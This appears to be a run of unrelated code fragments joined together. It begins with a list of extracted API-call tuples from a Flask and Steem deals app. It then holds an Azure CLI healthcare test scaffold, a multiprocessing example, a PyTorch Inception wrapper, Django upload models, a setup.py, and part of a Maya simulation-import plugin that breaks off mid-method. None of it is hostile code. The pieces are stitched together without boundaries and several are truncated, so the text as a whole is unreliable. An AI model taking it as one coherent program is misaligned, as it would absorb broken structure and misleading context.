render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((22713, 22740), 'slugify.slugify', 'slugify', (["deal_form['brand']"], {}), "(deal_form['brand'])\n", (22720, 22740), False, 'from slugify import slugify\n'), ((23607, 23643), 'flask.render_template', 'render_template', (['"""submit_deals.html"""'], {}), "('submit_deals.html')\n", (23622, 23643), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((23664, 23680), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (23671, 23680), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((4124, 4295), 'steem.Steem', 'Steem', ([], {'nodes': "['https://rpc.buildteam.io', 'https://api.steemit.com',\n 'https://steemd.steemitstage.com']", 'keys': "[app.config['POSTING_KEY'], app.config['ACTIVE_KEY']]"}), "(nodes=['https://rpc.buildteam.io', 'https://api.steemit.com',\n 'https://steemd.steemitstage.com'], keys=[app.config['POSTING_KEY'],\n app.config['ACTIVE_KEY']])\n", (4129, 4295), False, 'from steem import Steem\n'), ((5252, 5288), 'traceback.print_exc', 'traceback.print_exc', ([], {'file': 'sys.stdout'}), '(file=sys.stdout)\n', (5271, 5288), False, 'import sys, traceback, json, textwrap, requests, pprint, time, math, arrow\n'), ((6102, 6114), 'datetime.date.today', 'date.today', ([], {}), '()\n', (6112, 6114), False, 'from datetime import date, timedelta, datetime\n'), ((6403, 6415), 'datetime.date.today', 'date.today', ([], {}), '()\n', (6413, 6415), False, 'from datetime import date, timedelta, datetime\n'), ((7325, 7361), 'json.loads', 'json.loads', (["content['json_metadata']"], {}), "(content['json_metadata'])\n", (7335, 7361), False, 'import sys, traceback, json, textwrap, requests, pprint, time, math, arrow\n'), ((8681, 8706), 'flask.jsonify', 'jsonify', (["{'status': True}"], {}), "({'status': True})\n", (8688, 8706), False, 'from flask 
import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((9407, 9429), 'flask.request.form.to_dict', 'request.form.to_dict', ([], {}), '()\n', (9427, 9429), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((10503, 10532), 'slugify.slugify', 'slugify', (["deal_update['brand']"], {}), "(deal_update['brand'])\n", (10510, 10532), False, 'from slugify import slugify\n'), ((11329, 11370), 'flask.render_template', 'render_template', (['"""update.html"""'], {'deal': 'deal'}), "('update.html', deal=deal)\n", (11344, 11370), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((11537, 11573), 'flask.render_template', 'render_template', (['"""login_failed.html"""'], {}), "('login_failed.html')\n", (11552, 11573), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((14259, 14295), 'flask.render_template', 'render_template', (['"""login_failed.html"""'], {}), "('login_failed.html')\n", (14274, 14295), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((15060, 15076), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (15067, 15076), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((15140, 15176), 'flask.render_template', 'render_template', (['"""login_failed.html"""'], {}), "('login_failed.html')\n", (15155, 15176), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((16111, 16127), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (16118, 16127), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((16191, 16227), 'flask.render_template', 
'render_template', (['"""login_failed.html"""'], {}), "('login_failed.html')\n", (16206, 16227), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((16401, 16437), 'flask.render_template', 'render_template', (['"""login_failed.html"""'], {}), "('login_failed.html')\n", (16416, 16437), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((17050, 17221), 'steem.Steem', 'Steem', ([], {'nodes': "['https://rpc.buildteam.io', 'https://api.steemit.com',\n 'https://steemd.steemitstage.com']", 'keys': "[app.config['POSTING_KEY'], app.config['ACTIVE_KEY']]"}), "(nodes=['https://rpc.buildteam.io', 'https://api.steemit.com',\n 'https://steemd.steemitstage.com'], keys=[app.config['POSTING_KEY'],\n app.config['ACTIVE_KEY']])\n", (17055, 17221), False, 'from steem import Steem\n'), ((17971, 18007), 'traceback.print_exc', 'traceback.print_exc', ([], {'file': 'sys.stdout'}), '(file=sys.stdout)\n', (17990, 18007), False, 'import sys, traceback, json, textwrap, requests, pprint, time, math, arrow\n'), ((18324, 18340), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (18331, 18340), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((18445, 18481), 'flask.render_template', 'render_template', (['"""login_failed.html"""'], {}), "('login_failed.html')\n", (18460, 18481), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((21333, 21504), 'steem.Steem', 'Steem', ([], {'nodes': "['https://rpc.buildteam.io', 'https://api.steemit.com',\n 'https://steemd.steemitstage.com']", 'keys': "[app.config['POSTING_KEY'], app.config['ACTIVE_KEY']]"}), "(nodes=['https://rpc.buildteam.io', 'https://api.steemit.com',\n 'https://steemd.steemitstage.com'], keys=[app.config['POSTING_KEY'],\n app.config['ACTIVE_KEY']])\n", (21338, 
21504), False, 'from steem import Steem\n'), ((22931, 22967), 'traceback.print_exc', 'traceback.print_exc', ([], {'file': 'sys.stdout'}), '(file=sys.stdout)\n', (22950, 22967), False, 'import sys, traceback, json, textwrap, requests, pprint, time, math, arrow\n'), ((23422, 23438), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (23429, 23438), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((3038, 3070), 'dateutil.parser.parse', 'parser.parse', (["deal['deal_start']"], {}), "(deal['deal_start'])\n", (3050, 3070), False, 'from dateutil import parser\n'), ((3216, 3246), 'dateutil.parser.parse', 'parser.parse', (["deal['deal_end']"], {}), "(deal['deal_end'])\n", (3228, 3246), False, 'from dateutil import parser\n'), ((5809, 5821), 'datetime.date.today', 'date.today', ([], {}), '()\n', (5819, 5821), False, 'from datetime import date, timedelta, datetime\n'), ((6439, 6451), 'datetime.date.today', 'date.today', ([], {}), '()\n', (6449, 6451), False, 'from datetime import date, timedelta, datetime\n'), ((7707, 7734), 'flask.render_template', 'render_template', (['"""404.html"""'], {}), "('404.html')\n", (7722, 7734), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((8356, 8527), 'steem.Steem', 'Steem', ([], {'nodes': "['https://rpc.buildteam.io', 'https://api.steemit.com',\n 'https://steemd.steemitstage.com']", 'keys': "[app.config['POSTING_KEY'], app.config['ACTIVE_KEY']]"}), "(nodes=['https://rpc.buildteam.io', 'https://api.steemit.com',\n 'https://steemd.steemitstage.com'], keys=[app.config['POSTING_KEY'],\n app.config['ACTIVE_KEY']])\n", (8361, 8527), False, 'from steem import Steem\n'), ((8790, 8844), 'flask.jsonify', 'jsonify', (["{'status': False, 'msg': 'unknown exception'}"], {}), "({'status': False, 'msg': 'unknown exception'})\n", (8797, 8844), False, 'from flask import Flask, render_template, request, 
jsonify, redirect, url_for, session, flash, Response\n'), ((11148, 11164), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (11155, 11164), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((14663, 14699), 'flask.render_template', 'render_template', (['"""login_failed.html"""'], {}), "('login_failed.html')\n", (14678, 14699), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((18174, 18190), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (18181, 18190), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((20086, 20123), 'dateutil.parser.parse', 'parser.parse', (["deal_form['deal_start']"], {}), "(deal_form['deal_start'])\n", (20098, 20123), False, 'from dateutil import parser\n'), ((20269, 20304), 'dateutil.parser.parse', 'parser.parse', (["deal_form['deal_end']"], {}), "(deal_form['deal_end'])\n", (20281, 20304), False, 'from dateutil import parser\n'), ((23131, 23153), 'flask.url_for', 'url_for', (['"""submit_page"""'], {}), "('submit_page')\n", (23138, 23153), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((23775, 23787), 'datetime.date.today', 'date.today', ([], {}), '()\n', (23785, 23787), False, 'from datetime import date, timedelta, datetime\n'), ((23790, 23808), 'datetime.timedelta', 'timedelta', ([], {'days': '(10)'}), '(days=10)\n', (23799, 23808), False, 'from datetime import date, timedelta, datetime\n'), ((3145, 3157), 'datetime.date.today', 'date.today', ([], {}), '()\n', (3155, 3157), False, 'from datetime import date, timedelta, datetime\n'), ((17895, 17906), 'time.time', 'time.time', ([], {}), '()\n', (17904, 17906), False, 'import sys, traceback, json, textwrap, requests, pprint, time, math, arrow\n'), ((20198, 20210), 'datetime.date.today', 
'date.today', ([], {}), '()\n', (20208, 20210), False, 'from datetime import date, timedelta, datetime\n'), ((22112, 22123), 'time.time', 'time.time', ([], {}), '()\n', (22121, 22123), False, 'import sys, traceback, json, textwrap, requests, pprint, time, math, arrow\n'), ((22273, 22310), 'dateutil.parser.parse', 'parser.parse', (["deal_form['deal_start']"], {}), "(deal_form['deal_start'])\n", (22285, 22310), False, 'from dateutil import parser\n'), ((22462, 22497), 'dateutil.parser.parse', 'parser.parse', (["deal_form['deal_end']"], {}), "(deal_form['deal_end'])\n", (22474, 22497), False, 'from dateutil import parser\n'), ((3320, 3362), 'dateutil.parser.parse', 'parser.parse', (["deal_post_data['date_start']"], {}), "(deal_post_data['date_start'])\n", (3332, 3362), False, 'from dateutil import parser\n'), ((3365, 3383), 'datetime.timedelta', 'timedelta', ([], {'days': '(45)'}), '(days=45)\n', (3374, 3383), False, 'from datetime import date, timedelta, datetime\n'), ((10015, 10054), 'dateutil.parser.parse', 'parser.parse', (["deal_update['deal_start']"], {}), "(deal_update['deal_start'])\n", (10027, 10054), False, 'from dateutil import parser\n'), ((10226, 10263), 'dateutil.parser.parse', 'parser.parse', (["deal_update['deal_end']"], {}), "(deal_update['deal_end'])\n", (10238, 10263), False, 'from dateutil import parser\n'), ((20378, 20420), 'dateutil.parser.parse', 'parser.parse', (["deal_post_data['date_start']"], {}), "(deal_post_data['date_start'])\n", (20390, 20420), False, 'from dateutil import parser\n'), ((20423, 20441), 'datetime.timedelta', 'timedelta', ([], {'days': '(45)'}), '(days=45)\n', (20432, 20441), False, 'from datetime import date, timedelta, datetime\n'), ((22388, 22400), 'datetime.date.today', 'date.today', ([], {}), '()\n', (22398, 22400), False, 'from datetime import date, timedelta, datetime\n'), ((10142, 10154), 'datetime.date.today', 'date.today', ([], {}), '()\n', (10152, 10154), False, 'from datetime import date, timedelta, 
datetime\n'), ((22574, 22586), 'datetime.date.today', 'date.today', ([], {}), '()\n', (22584, 22586), False, 'from datetime import date, timedelta, datetime\n'), ((22589, 22607), 'datetime.timedelta', 'timedelta', ([], {'days': '(45)'}), '(days=45)\n', (22598, 22607), False, 'from datetime import date, timedelta, datetime\n'), ((10350, 10362), 'datetime.date.today', 'date.today', ([], {}), '()\n', (10360, 10362), False, 'from datetime import date, timedelta, datetime\n'), ((10365, 10383), 'datetime.timedelta', 'timedelta', ([], {'days': '(45)'}), '(days=45)\n', (10374, 10383), False, 'from datetime import date, timedelta, datetime\n'), ((11735, 11747), 'datetime.date.today', 'date.today', ([], {}), '()\n', (11745, 11747), False, 'from datetime import date, timedelta, datetime\n'), ((12854, 12866), 'datetime.date.today', 'date.today', ([], {}), '()\n', (12864, 12866), False, 'from datetime import date, timedelta, datetime\n'), ((13222, 13234), 'datetime.date.today', 'date.today', ([], {}), '()\n', (13232, 13234), False, 'from datetime import date, timedelta, datetime\n'), ((13573, 13585), 'datetime.date.today', 'date.today', ([], {}), '()\n', (13583, 13585), False, 'from datetime import date, timedelta, datetime\n'), ((24241, 24273), 'dateutil.parser.parse', 'parser.parse', (["deal['deal_start']"], {}), "(deal['deal_start'])\n", (24253, 24273), False, 'from dateutil import parser\n')] |
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import os
from azure.cli.testsdk import ScenarioTest
from .. import try_manual, raise_if, calc_coverage
from azure.cli.testsdk import ResourceGroupPreparer
from azure.cli.testsdk import StorageAccountPreparer
TEST_DIR = os.path.abspath(os.path.join(os.path.abspath(__file__), '..'))
# Env setup
@try_manual
def setup(test, rg, rg_2):
pass
# EXAMPLE: ServicePut
@try_manual
def step_serviceput(test, rg, rg_2):
# EXAMPLE NOT FOUND!
pass
# EXAMPLE: OperationResultsGet
@try_manual
def step_operationresultsget(test, rg, rg_2):
# EXAMPLE NOT FOUND!
pass
# EXAMPLE: ServiceGet
@try_manual
def step_serviceget(test, rg, rg_2):
# EXAMPLE NOT FOUND!
pass
# EXAMPLE: ServiceListByResourceGroup
@try_manual
def step_servicelistbyresourcegroup(test, rg, rg_2):
# EXAMPLE NOT FOUND!
pass
# EXAMPLE: ServiceList
@try_manual
def step_servicelist(test, rg, rg_2):
# EXAMPLE NOT FOUND!
pass
# EXAMPLE: OperationsList
@try_manual
def step_operationslist(test, rg, rg_2):
# EXAMPLE NOT FOUND!
pass
# EXAMPLE: ServicePatch
@try_manual
def step_servicepatch(test, rg, rg_2):
# EXAMPLE NOT FOUND!
pass
# EXAMPLE: CheckNameAvailabilityPost
@try_manual
def step_checknameavailabilitypost(test, rg, rg_2):
# EXAMPLE NOT FOUND!
pass
# EXAMPLE: ServiceDelete
@try_manual
def step_servicedelete(test, rg, rg_2):
# EXAMPLE NOT FOUND!
pass
# Env cleanup
@try_manual
def cleanup(test, rg, rg_2):
pass
# Testcase
@try_manual
def call_scenario(test, rg, rg_2):
setup(test, rg, rg_2)
step_serviceput(test, rg, rg_2)
step_operationresultsget(test, rg, rg_2)
step_serviceget(test, rg, rg_2)
step_servicelistbyresourcegroup(test, rg, rg_2)
step_servicelist(test, rg, rg_2)
step_operationslist(test, rg, rg_2)
step_servicepatch(test, rg, rg_2)
step_checknameavailabilitypost(test, rg, rg_2)
step_servicedelete(test, rg, rg_2)
cleanup(test, rg, rg_2)
@try_manual
class HealthcareApisManagementClientScenarioTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix='clitesthealthcareapis_rgname'[:7], key='rg', parameter_name='rg')
@ResourceGroupPreparer(name_prefix='clitesthealthcareapis_rg1'[:7], key='rg_2', parameter_name='rg_2')
@StorageAccountPreparer(name_prefix='clitesthealthcareapis_existingStorageAccount'[:7], key='sa',
resource_group_parameter_name='rg')
def test_healthcareapis(self, rg, rg_2):
self.kwargs.update({
'myPrivateEndpointConnection': 'myConnection',
})
call_scenario(self, rg, rg_2)
calc_coverage(__file__)
raise_if()
| [
"os.path.abspath",
"azure.cli.testsdk.StorageAccountPreparer",
"azure.cli.testsdk.ResourceGroupPreparer"
] | [((2507, 2612), 'azure.cli.testsdk.ResourceGroupPreparer', 'ResourceGroupPreparer', ([], {'name_prefix': '"""clitesthealthcareapis_rgname"""[:7]', 'key': '"""rg"""', 'parameter_name': '"""rg"""'}), "(name_prefix='clitesthealthcareapis_rgname'[:7], key=\n 'rg', parameter_name='rg')\n", (2528, 2612), False, 'from azure.cli.testsdk import ResourceGroupPreparer\n'), ((2613, 2719), 'azure.cli.testsdk.ResourceGroupPreparer', 'ResourceGroupPreparer', ([], {'name_prefix': '"""clitesthealthcareapis_rg1"""[:7]', 'key': '"""rg_2"""', 'parameter_name': '"""rg_2"""'}), "(name_prefix='clitesthealthcareapis_rg1'[:7], key=\n 'rg_2', parameter_name='rg_2')\n", (2634, 2719), False, 'from azure.cli.testsdk import ResourceGroupPreparer\n'), ((2720, 2861), 'azure.cli.testsdk.StorageAccountPreparer', 'StorageAccountPreparer', ([], {'name_prefix': '"""clitesthealthcareapis_existingStorageAccount"""[:7]', 'key': '"""sa"""', 'resource_group_parameter_name': '"""rg"""'}), "(name_prefix=\n 'clitesthealthcareapis_existingStorageAccount'[:7], key='sa',\n resource_group_parameter_name='rg')\n", (2742, 2861), False, 'from azure.cli.testsdk import StorageAccountPreparer\n'), ((710, 735), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (725, 735), False, 'import os\n')] |
import multiprocessing
def sum_up_to(number):
return sum(range(1, number + 1))
if __name__ == '__main__':
# Create pool object
pool = multiprocessing.Pool(4)
# Run `sum_up_to` 10 times simultaneously
result = pool.map(sum_up_to, range(10))
print(result) | [
"multiprocessing.Pool"
] | [((152, 175), 'multiprocessing.Pool', 'multiprocessing.Pool', (['(4)'], {}), '(4)\n', (172, 175), False, 'import multiprocessing\n')] |
import torch
import torch.nn as nn
from torch.nn import Parameter as P
from torchvision.models.inception import inception_v3
import torch.nn.functional as F
# Module that wraps the inception network to enable use with dataparallel and
# returning pool features and logits.
class WrapInception(nn.Module):
def __init__(self, net):
super(WrapInception,self).__init__()
self.net = net
self.mean = P(torch.tensor([0.485, 0.456, 0.406]).view(1, -1, 1, 1),
requires_grad=False)
self.std = P(torch.tensor([0.229, 0.224, 0.225]).view(1, -1, 1, 1),
requires_grad=False)
def forward(self, x):
x = (x - self.mean) / self.std
# Upsample if necessary
if x.shape[2] != 299 or x.shape[3] != 299:
x = F.interpolate(x, size=(299, 299), mode='bilinear', align_corners=True)
# 299 x 299 x 3
x = self.net.Conv2d_1a_3x3(x)
# 149 x 149 x 32
x = self.net.Conv2d_2a_3x3(x)
# 147 x 147 x 32
x = self.net.Conv2d_2b_3x3(x)
# 147 x 147 x 64
x = F.max_pool2d(x, kernel_size=3, stride=2)
# 73 x 73 x 64
x = self.net.Conv2d_3b_1x1(x)
# 73 x 73 x 80
x = self.net.Conv2d_4a_3x3(x)
# 71 x 71 x 192
x = F.max_pool2d(x, kernel_size=3, stride=2)
# 35 x 35 x 192
x = self.net.Mixed_5b(x)
# 35 x 35 x 256
x = self.net.Mixed_5c(x)
# 35 x 35 x 288
x = self.net.Mixed_5d(x)
# 35 x 35 x 288
x = self.net.Mixed_6a(x)
# 17 x 17 x 768
x = self.net.Mixed_6b(x)
# 17 x 17 x 768
x = self.net.Mixed_6c(x)
# 17 x 17 x 768
x = self.net.Mixed_6d(x)
# 17 x 17 x 768
x = self.net.Mixed_6e(x)
# 17 x 17 x 768
# 17 x 17 x 768
x = self.net.Mixed_7a(x)
# 8 x 8 x 1280
x = self.net.Mixed_7b(x)
# 8 x 8 x 2048
x = self.net.Mixed_7c(x)
# 8 x 8 x 2048
pool = torch.mean(x.view(x.size(0), x.size(1), -1), 2)
# 1 x 1 x 2048
logits = self.net.fc(F.dropout(pool, training=False).view(pool.size(0), -1))
# 1000 (num_classes)
return pool, logits
# Load and wrap the Inception model
def load_inception_net(parallel=False):
inception_model = inception_v3(pretrained=True, transform_input=False)
inception_model = WrapInception(inception_model.eval()).cuda()
if parallel:
inception_model = nn.DataParallel(inception_model)
return inception_model
| [
"torchvision.models.inception.inception_v3",
"torch.nn.DataParallel",
"torch.nn.functional.dropout",
"torch.tensor",
"torch.nn.functional.interpolate",
"torch.nn.functional.max_pool2d"
] | [((2340, 2392), 'torchvision.models.inception.inception_v3', 'inception_v3', ([], {'pretrained': '(True)', 'transform_input': '(False)'}), '(pretrained=True, transform_input=False)\n', (2352, 2392), False, 'from torchvision.models.inception import inception_v3\n'), ((1101, 1141), 'torch.nn.functional.max_pool2d', 'F.max_pool2d', (['x'], {'kernel_size': '(3)', 'stride': '(2)'}), '(x, kernel_size=3, stride=2)\n', (1113, 1141), True, 'import torch.nn.functional as F\n'), ((1300, 1340), 'torch.nn.functional.max_pool2d', 'F.max_pool2d', (['x'], {'kernel_size': '(3)', 'stride': '(2)'}), '(x, kernel_size=3, stride=2)\n', (1312, 1340), True, 'import torch.nn.functional as F\n'), ((2503, 2535), 'torch.nn.DataParallel', 'nn.DataParallel', (['inception_model'], {}), '(inception_model)\n', (2518, 2535), True, 'import torch.nn as nn\n'), ((805, 875), 'torch.nn.functional.interpolate', 'F.interpolate', (['x'], {'size': '(299, 299)', 'mode': '"""bilinear"""', 'align_corners': '(True)'}), "(x, size=(299, 299), mode='bilinear', align_corners=True)\n", (818, 875), True, 'import torch.nn.functional as F\n'), ((425, 460), 'torch.tensor', 'torch.tensor', (['[0.485, 0.456, 0.406]'], {}), '([0.485, 0.456, 0.406])\n', (437, 460), False, 'import torch\n'), ((544, 579), 'torch.tensor', 'torch.tensor', (['[0.229, 0.224, 0.225]'], {}), '([0.229, 0.224, 0.225])\n', (556, 579), False, 'import torch\n'), ((2128, 2159), 'torch.nn.functional.dropout', 'F.dropout', (['pool'], {'training': '(False)'}), '(pool, training=False)\n', (2137, 2159), True, 'import torch.nn.functional as F\n')] |
from django.db import models
from django.utils.translation import gettext_lazy as _
from paper_uploads.models import *
from paper_uploads.cloudinary.models import *
__all__ = [
"CustomUploadedFile",
"CustomUploadedImage",
"CustomCloudinaryFile",
"CustomProxyGallery",
"CustomGallery",
"CustomCloudinaryGallery",
]
# =========== Proxy models ==================
class CustomUploadedFile(UploadedFile):
class Meta:
proxy = True
def get_file_folder(self) -> str:
return "custom-files/%Y"
class CustomUploadedImage(UploadedImage):
class Meta:
proxy = True
def get_file_folder(self) -> str:
return "custom-images/%Y"
class CustomProxyImageItem(ImageItem):
class Meta:
proxy = True
def get_file_folder(self) -> str:
return "collections/custom-images/%Y"
class CustomCloudinaryFile(CloudinaryFile):
class Meta:
proxy = True
def get_file_folder(self) -> str:
return "custom-files/%Y"
# =========== Concrete models ==================
class CustomImageItem(ImageItemBase):
caption = models.TextField(_("caption"), blank=True)
def get_file_folder(self) -> str:
return "collections/custom-images/%Y"
class CustomCloudinaryImageItem(CloudinaryImageItemBase):
caption = models.TextField(_("caption"), blank=True)
def get_file_folder(self) -> str:
return "collections/custom-images/%Y"
class CustomProxyGallery(ImageCollection):
VARIATIONS = dict(
desktop=dict(
size=(1200, 0),
clip=False,
)
)
image = CollectionItem(CustomProxyImageItem)
class CustomGallery(ImageCollection):
VARIATIONS = dict(
desktop=dict(
size=(1200, 0),
clip=False,
)
)
image = CollectionItem(CustomImageItem)
class CustomCloudinaryGallery(CloudinaryImageCollection):
image = CollectionItem(CustomCloudinaryImageItem)
| [
"django.utils.translation.gettext_lazy"
] | [((1133, 1145), 'django.utils.translation.gettext_lazy', '_', (['"""caption"""'], {}), "('caption')\n", (1134, 1145), True, 'from django.utils.translation import gettext_lazy as _\n'), ((1335, 1347), 'django.utils.translation.gettext_lazy', '_', (['"""caption"""'], {}), "('caption')\n", (1336, 1347), True, 'from django.utils.translation import gettext_lazy as _\n')] |
# -*- coding: utf-8 -*-
"""setup.py: setuptools control."""
from setuptools import setup
setup(name='xyz2rast',
version='0.1.1',
description='Gridding algorithm for time series XYZ data',
url='https://github.com/tashley/xyz2rast.git',
author='<NAME>',
author_email='<EMAIL>',
license='MIT',
packages=['xyz2rast'],
zip_safe=False)
| [
"setuptools.setup"
] | [((94, 353), 'setuptools.setup', 'setup', ([], {'name': '"""xyz2rast"""', 'version': '"""0.1.1"""', 'description': '"""Gridding algorithm for time series XYZ data"""', 'url': '"""https://github.com/tashley/xyz2rast.git"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'license': '"""MIT"""', 'packages': "['xyz2rast']", 'zip_safe': '(False)'}), "(name='xyz2rast', version='0.1.1', description=\n 'Gridding algorithm for time series XYZ data', url=\n 'https://github.com/tashley/xyz2rast.git', author='<NAME>',\n author_email='<EMAIL>', license='MIT', packages=['xyz2rast'], zip_safe=\n False)\n", (99, 353), False, 'from setuptools import setup\n')] |
# The MIT License
#
# Copyright (c) 2008 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import sys
import gc
import maya.OpenMaya as OpenMaya
import maya.OpenMayaMPx as OpenMayaMPx
import maya.cmds as mc
import ns.py
import ns.py.Errors
import ns.maya.msv
import ns.bridge.io.MasReader as MasReader
import ns.bridge.data.Scene as Scene
import ns.bridge.data.Sim as Sim
import ns.maya.msv.MayaSkin as MayaSkin
import ns.maya.msv.MayaSim as MayaSim
import ns.maya.msv.MayaAgent as MayaAgent
import ns.maya.msv.MayaSimAgent as MayaSimAgent
kName = "msvSimImport"
kSimDirFlag = "-sd"
kSimDirFlagLong = "-simDir"
kSimTypeFlag = "-st"
kSimTypeFlagLong = "-simType"
kMasFileFlag = "-mas"
kMasFileFlagLong = "-masFile"
kCallsheetFlag = "-cal"
kCallsheetFlagLong = "-callsheet"
kLoadGeometryFlag = "-lg"
kLoadGeometryFlagLong = "-loadGeometry"
kSkinTypeFlag = "-skt"
kSkinTypeFlagLong = "-skinType"
kLoadSegmentsFlag = "-ls"
kLoadSegmentsFlagLong = "-loadSegments"
kLoadMaterialsFlag = "-lm"
kLoadMaterialsFlagLong = "-loadMaterials"
kMaterialTypeFlag = "-mt"
kMaterialTypeFlagLong = "-materialType"
kFrameStepFlag = "-fs"
kFrameStepFlagLong = "-frameStep"
kInstanceSegmentsFlag = "-is"
kInstanceSegmentsFlagLong = "-instanceSegments"
kSelectionFlag = "-sel"
kSelectionFlagLong = "-selection"
kCacheGeometryFlag = "-cg"
kCacheGeometryFlagLong = "-cacheGeometry"
kDeleteSkeletonFlag = "-ds"
kDeleteSkeletonFlagLong = "-deleteSkeleton"
kCacheDirFlag = "-cd"
kCacheDirFlagLong = "-cacheDir"
kRangeFlag = "-r"
kRangeFlagLong = "-range"
kAnimTypeFlag = "-at"
kAnimTypeFlagLong = "-animType"
class MsvSimImportCmd( OpenMayaMPx.MPxCommand ):
def __init__(self):
OpenMayaMPx.MPxCommand.__init__(self)
def isUndoable( self ):
return False
def _parseArgs( self, argData ):
options = {}
if argData.isFlagSet(kSimDirFlag):
options[kSimDirFlag] = argData.flagArgumentString(kSimDirFlag, 0 )
else:
options[kSimDirFlag] = ""
if argData.isFlagSet(kSimTypeFlag):
options[kSimTypeFlag] = ".%s" % argData.flagArgumentString(kSimTypeFlag, 0)
else:
options[kSimTypeFlag] = ".amc"
if argData.isFlagSet(kMasFileFlag):
options[kMasFileFlag] = argData.flagArgumentString(kMasFileFlag, 0)
else:
raise ns.py.Errors.BadArgumentError("The %s/%s flag is required" % (kMasFileFlagLong, kMasFileFlag))
if argData.isFlagSet(kCallsheetFlag):
options[kCallsheetFlag] = argData.flagArgumentString(kCallsheetFlag, 0)
else:
options[kCallsheetFlag] = ""
if argData.isFlagSet(kLoadGeometryFlag):
options[kLoadGeometryFlag] = argData.flagArgumentBool(kLoadGeometryFlag, 0)
else:
options[kLoadGeometryFlag] = True
if argData.isFlagSet( kSkinTypeFlag ):
str = argData.flagArgumentString( kSkinTypeFlag, 0 )
if (str == "smooth"):
options[kSkinTypeFlag] = MayaSkin.eSkinType.smooth
elif (str == "duplicate"):
options[kSkinTypeFlag] = MayaSkin.eSkinType.duplicate
elif (str == "instance"):
options[kSkinTypeFlag] = MayaSkin.eSkinType.instance
else:
raise ns.py.Errors.BadArgumentError( 'Please choose either "smooth", "duplicate", or "instance" as the skinType' )
else:
options[kSkinTypeFlag] = MayaSkin.eSkinType.smooth
if argData.isFlagSet( kLoadSegmentsFlag ):
options[kLoadSegmentsFlag] = argData.flagArgumentBool( kLoadSegmentsFlag, 0 )
else:
options[kLoadSegmentsFlag] = False
if argData.isFlagSet( kLoadMaterialsFlag ):
options[kLoadMaterialsFlag] = argData.flagArgumentBool( kLoadMaterialsFlag, 0 )
else:
options[kLoadMaterialsFlag] = True
if argData.isFlagSet(kMaterialTypeFlag):
options[kMaterialTypeFlag] = argData.flagArgumentString(kMaterialTypeFlag, 0)
else:
options[kMaterialTypeFlag] = "blinn"
if argData.isFlagSet( kFrameStepFlag ):
options[kFrameStepFlag] = argData.flagArgumentInt( kFrameStepFlag, 0 )
else:
options[kFrameStepFlag] = 1
if argData.isFlagSet( kInstanceSegmentsFlag ):
options[kInstanceSegmentsFlag] = argData.flagArgumentBool( kInstanceSegmentsFlag, 0 )
else:
options[kInstanceSegmentsFlag] = True
if argData.isFlagSet( kSelectionFlag ):
selections =[]
num = argData.numberOfFlagUses( kSelectionFlag )
for i in range(num):
args = OpenMaya.MArgList()
argData.getFlagArgumentList( kSelectionFlag, i, args )
if args.length():
selections.append( args.asString(0) )
options[kSelectionFlag] = selections
else:
options[kSelectionFlag] = []
if argData.isFlagSet( kCacheGeometryFlag ):
options[kCacheGeometryFlag] = argData.flagArgumentBool( kCacheGeometryFlag, 0 )
else:
